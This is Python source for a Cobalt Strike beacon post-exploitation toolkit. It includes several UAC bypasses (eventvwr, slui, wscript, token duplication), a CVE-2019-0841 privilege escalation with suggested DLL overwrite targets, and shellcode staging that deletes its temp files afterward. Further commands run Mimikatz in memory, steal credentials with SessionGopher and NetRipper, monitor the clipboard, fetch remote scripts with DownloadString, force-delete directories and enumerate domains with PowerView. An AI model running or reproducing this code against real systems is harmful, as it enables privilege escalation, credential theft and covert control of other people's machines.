def _(bid, pattern, out=None): import_host_recon(bid) command = 'Get-IndexedFiles {}'.format(powershell_quote(pattern)) if out: # output to file command += ' > {}'.format(powershell_quote(out)) aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False): # no args if not args: args = [] if program in assemblies: assembly = assemblies[program] args = helpers.eaq(args) if not silent: aggressor.btask(bid, 'Tasked beacon to run {} {}'.format(program, args)) aggressor.bexecute_assembly(bid, assembly, args, silent=True) elif program in powershell: script = powershell[program] aggressor.bpowershell_import(bid, script) if isinstance(args, list) or isinstance(args, tuple): args = ' '.join(powershell_quote(args)) aggressor.bpowerpick(bid, ' '.join(args)) elif program in callbacks: callback = callbacks[program] callback(bid, args, silent=silent) else: raise RuntimeError('Unrecognized program: {}'.format(program))
def elevate_token_shellcode_csharp(bid, shellcode): """ Elevate with token duplication bypass. Execute `shellcode` with a C# helper. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) execute_shellcode = utils.basedir('tools/execute_shellcode.exe') execute_assembly = utils.basedir('tools/execute_assembly.exe') stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid)) #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid)) stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid)) package = r'{}\nuget.package'.format(helpers.guess_temp(bid)) helpers.upload_to(bid, execute_assembly, stage1) helpers.upload_to(bid, execute_shellcode, stage2) helpers.upload_to(bid, shellcode, package) command = 'Invoke-TokenDuplication -Binary {}'.format( powershell_quote(stage2)) aggressor.bpowerpick(bid, command) aggressor.brm(bid, stage1) aggressor.brm(bid, stage2) aggressor.brm(bid, package)
def elevate_slui_command(bid, command): """ Elevate with slui bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid, out=None): aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1')) command = 'Get-AccountSPNs' if out: # output to file command += ' > {}'.format(powershell_quote(out)) aggressor.bpowerpick(bid, command)
def elevate_eventvwr_command(bid, command): """ Elevate with eventvwr bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1')) aggressor.bpowerpick( bid, 'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_wscript_command(bid, command): """ Elevate with wscript bypass. """ aggressor.bpowershell_import( bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')) aggressor.bpowerpick( bid, 'Invoke-WScriptBypassUAC -payload {}'.format( powershell_quote(command)))
def elevate_cve_2019_0841(bid, target, overwrite=None): r""" Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally overwrite 'target' with 'overwrite'. Good overwrite options: - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate) - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually) """ native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1') edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*' settings_dat = r'\Settings\settings.dat' command = helpers.code_string(r""" # Stop Edge echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} sleep 3 # Hardlink $edge_dir = Resolve-Path {edge_dir} $settings_dat = $edge_dir.Path + '{settings_dat}' echo "[.] Making Hardlink from $settings_dat to {target}" rm $settings_dat Native-HardLink -Verbose -Link $settings_dat -Target {target} # Start Edge echo "[.] Starting Edge" Start Microsoft-Edge: sleep 3 # Stop it again echo "[.] Stopping Edge" $process = Get-Process -Name MicrosoftEdge 2>$null if ($process) {{ $process | Stop-Process }} echo "[+] All Finished!" echo "[.] New ACLs:" Get-Acl {target} | Format-List """.format(edge_dir=edge_dir, settings_dat=settings_dat, target=powershell_quote(target))) aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True) aggressor.bpowerpick(bid, command, silent=True) if overwrite: helpers.upload_to(bid, overwrite, target) helpers.explorer_stomp(bid, target)
def elevate_token_command(bid, command, *other_args): """ Elevate with token duplication bypass. Execute `command` with `arguments`. """ command, *arguments = command.split() aggressor.bpowershell_import( bid, utils.basedir('modules/FilelessUACBypass.ps1')) powershell = 'Invoke-TokenDuplication -Binary {} '.format( powershell_quote(command)) if arguments: powershell += '-Arguments {} '.format( powershell_quote(' '.join(arguments))) if other_args: powershell += ' '.join(other_args) aggressor.bpowerpick(bid, powershell)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = 'ls ' command += ', '.join([powershell_quote('{}\*\*'.format(d)) for d in dirs]) aggressor.btask(bid, 'Tasked beacon to list */* in: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): if not dirs: aggressor.berror(bid, 'rmr: specify some directories to kill') return command = '' for d in dirs: command += 'Remove-Item -Recurse -Force {}\n'.format( powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += 'Get-ChildItem -Recurse {}\n'.format(powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to recursively list files in: {}'.format( ', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts): command = '' if not hosts: aggressor.berror('specify a host') return for host in hosts: command += 'nslookup {}\n'.format(powershell_quote(host)) aggressor.btask( bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += 'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'.format( powershell_quote(d)) aggressor.btask( bid, 'Tasked beacon to list links in: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *lnks): command = '$sh = New-Object -ComObject WScript.Shell' for lnk in lnks: command += helpers.code_string(r""" $shortcut = $sh.CreateShortcut({}) #$target = $shortcut.TargetPath #$arguments = $target.Arguments #echo "$target $arguments" echo "$shortcut.TargetPath $target.Arguments" """.format(powershell_quote(lnk))) aggressor.btask(bid, 'Tasked beacon to read links: {}'.format(', '.join(lnks))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, command, *args): script_file = utils.basedir( 'powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1') with open(script_file, 'r') as fp: script = fp.read() # host it cmd = aggressor.beacon_host_script(bid, script) time.sleep(10) # execute in-memory hosted script engine.message(cmd) aggressor.bpowerpick( bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format( command, ' '.join(powershell_quote(args))))
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] #command += "Where-Object { -not \$_.PsIsContainer } | command = '' for d in dirs: command += helpers.code_string(r""" Get-ChildItem -Path {} | Sort-Object LastWriteTime -Ascending; """.format(powershell_quote(d))) aggressor.btask( bid, 'Tasked beacon to do a sorted-by-time list of: {}'.format( ', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, url): if ':' not in url: # add scheme url = 'http://' + url command = helpers.code_string(r""" $request = [System.Net.WebRequest]::Create({}) """.format(powershell_quote(url))) command += helpers.code_string(r""" $response = $request.GetResponse() $headers = $response.Headers $headers.AllKeys | Select-Object @{ Name = "Key"; Expression = { $_ }}, @{ Name = "Value"; Expression = { $headers.GetValues( $_ ) } } """) aggressor.btask(bid, 'Tasked beacon to get headers for URL: {}'.format(url)) aggressor.bpowerpick(bid, command, silent=True)
def _(bid): temp = helpers.guess_temp(bid) # Forests and trusts: # Get-DomainTrustMapping # Get-ForestTrust # Get-DomainTrust # Parsing GPOs: # Get-GptTmpl # Get-GroupsXML # File shares: # Get-DomainFileServer # Get-DomainDFSShare # Get-DomainManagedSecurityGroup? # TODO remove subnet and site? # computer objects don't show up in Get-DomainObject for some reason command = helpers.code_string(r""" cd {} $FormatEnumerationLimit=-1 Get-DomainObject | Format-List -Property * > objects.domain Get-DomainPolicyData | Format-List -Property * > policy.domain Get-DomainSite | Format-List -Property * > sites.domain Get-DomainSubnet | Format-List -Property * > subnets.domain Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain Get-GPODelegation | Format-List -Property * > gpo_delegations.domain Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain Get-DomainTrustMapping | Format-List -Property * > trusts.domain Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain echo "All finished with domain-enum. Run domain-enum-next." """.format(powershell_quote(temp))) aggressor.btask( bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)') external.run(bid, 'powerview', command)
def _(bid, *dirs): # default dir is . if not dirs: dirs = ['.'] command = '' for d in dirs: command += """ gci {} | """.format(powershell_quote(d)) command += helpers.code_string(r""" %{$f=$_; gci -r $_.FullName | measure-object -property length -sum | select @{Name="Name"; Expression={$f}}, @{Name="Sum (MB)"; Expression={"{0:N3}" -f ($_.sum / 1MB) }}, Sum } | sort Sum -desc | format-table -Property Name,"Sum (MB)", Sum -autosize; """) aggressor.btask( bid, 'Tasked beacon to get file sizes in: {}'.format(', '.join(dirs))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args): parser = helpers.ArgumentParser(bid=bid, prog='find') parser.add_argument('-n', '--name', action='append', help='Name to match') parser.add_argument('-i', '--iname', action='append', help='Name to match (case insensitive)') parser.add_argument('--not', dest='not_', action='store_true', help='Invert --name and --iname') parser.add_argument('-d', '--days', type=int, help='Select files no more than DAYS old') parser.add_argument('--dirs', action='store_true', help='Include directories') parser.add_argument('-o', '--out', help='Output file') parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose') parser.add_argument('--home', action='store_true', help='Search relative to %USERPROFILE% instead of .') parser.add_argument('dir', default='.', help='Directory to search from (default: .)') try: args = parser.parse_args(args) except: return # --home if args.home: directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir)) else: directory = powershell_quote(args.dir) command = 'gci -Recurse -Path {} 2>$null'.format(directory) # --dirs if not args.dirs: command += ' | where { ! $_.PSIsContainer }' name_matches = [] # -n/--name if args.name: for name in args.name: name_matches.append('$_.Name -Clike {}'.format( powershell_quote(name))) # -i/--iname if args.iname: for iname in args.iname: name_matches.append('$_.Name -Like {}'.format( powershell_quote(iname))) if name_matches: where_statement = ' -Or '.join(name_matches) # --not if args.not_: where_statement = '-Not ({})'.format(where_statement) command += " | Where-Object { " + where_statement + " }" # -d/--days if args.days: command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }' # -o/--out if args.out: command += ' > {}'.format(powershell_quote(args.out)) command += "; echo 'Finished searching in {}'".format(directory) aggressor.btask( bid, 'Tasked beacon to search for files in {}'.format(directory)) # -v/--verbose aggressor.bpowerpick(bid, command, silent=not args.verbose)
def _(bid, *exes): command = '' if not exes: raise RuntimeError('describe: Specify at least one exe to describe') for exe in exes: command += '"{0}, {1}" -f $_.Name, [System.Diagnostics.FileVersionInfo]::GetVersionInfo(' + powershell_quote( exe) + ').FileDescription }\n' aggressor.btask( bid, 'Tasked beacon to show version info for: {}'.format(', '.join(exes))) aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args): aggressor.bpowershell_import(bid, utils.basedir('powershell/SessionGopher.ps1')) aggressor.bpowerpick( bid, 'Invoke-SessionGopher ' + ' '.join(powershell_quote(args)))
def _(bid, *args): aggressor.bpowershell_import( bid, utils.basedir('powershell/Invoke-NetRipper.ps1')) aggressor.bpowerpick( bid, r'Invoke-NetRipper -LogLocation C:\Temp\ ' + ' '.join(powershell_quote(args)))
def _(bid, *args): aggressor.bpowershell_import(bid, utils.basedir('powershell/Start-ClipboardMonitor.ps1')) aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(' '.join(powershell_quote(args))))
def _(bid, url): aggressor.bpowerpick( bid, '(New-Object System.Net.WebClient).DownloadString({})'.format( powershell_quote(url)))
def _(bid, fname, lines=10): aggressor.btask('Tasked beacon to get tail of {}'.format(fname)) aggressor.bpowerpick(bid, 'gc {} | select -last {} '.format( powershell_quote(fname), lines), silent=True)